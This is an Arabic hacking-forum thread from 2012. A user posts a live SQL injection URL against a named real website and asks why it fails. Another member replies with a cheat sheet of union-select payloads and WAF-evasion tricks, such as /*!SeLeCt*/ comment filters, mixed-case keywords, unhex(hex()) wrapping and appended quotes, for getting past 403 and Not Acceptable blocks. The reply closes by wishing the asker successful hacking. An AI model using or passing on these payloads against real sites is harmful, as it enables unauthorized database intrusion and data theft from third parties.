not found

Mr ToMaHoK · 03-22-2012, 01:16 AM

عند حقن الموقع طلعة عدد الاعمد

وجدول مصاب و اصدار القاعدة

لكن عند هده الحقن طلع not found

كود PHP:

  http://growradio.org/show.php?id=-63+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12+from+information_schema.columns--

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC not found

Dr.Unkn0wn · 03-22-2012, 01:29 AM

السلام عليكم ،،
تابع هذا الدرسـ ،
الدرس الرابع والعشرون تخطي مشكل not fond في المواقع الي تكون مصابه

MO3ETH · 03-22-2012, 09:05 PM

اقتباس

المشاركة الأصلية كتبت بواسطة Mr ToMaHoK


	عند حقن الموقع طلعة عدد الاعمد وجدول مصاب و اصدار القاعدة لكن عند هده الحقن طلع not found كود PHP: `http://growradio.org/show.php?id=-63+union+select+1,2,concat(table_name,0x3a,column_name,0x3a,table_schema),4,5,6,7,8,9,10,11,12+from+information_schema.columns--`

==============================
أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
==============================
تخطي Forbidden 403 اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
ليصبح بهذا الشكل
==============================
+
==============================
from+information_schema./*!columns*/+where+table_schema=database()--
==============================
أوامر تخطي Not Acceptable
==============================
تخطي Not Acceptable اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي
Not Acceptable
اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
تخطي Not Acceptable اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
أوامر تخطي الحماية من بعض الأوامر
==============================
هذا الأمر نضعه مكان العامود المصاب
==============================
concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
==============================
وهذا الأمر نضعه في نهاية الرابط
==============================
+from+information_schema.columns--
==============================
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
نقوم باضافة
==============================
+--+
==============================
في نهاية الرابط
==============================
واضافة
العلامة التي بين قوسين
==============================
(')
==============================
بعد
==============================
.php?id=1
==============================
ليصبح بهذا الشكل
==============================
.php?id=1'
==============================

أرجو لك الإفادة و إختراق موفق

Mr ToMaHoK · 03-23-2012, 02:10 PM

شكر لك اخي

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

not found

جـــ'ابات العناكــ'ب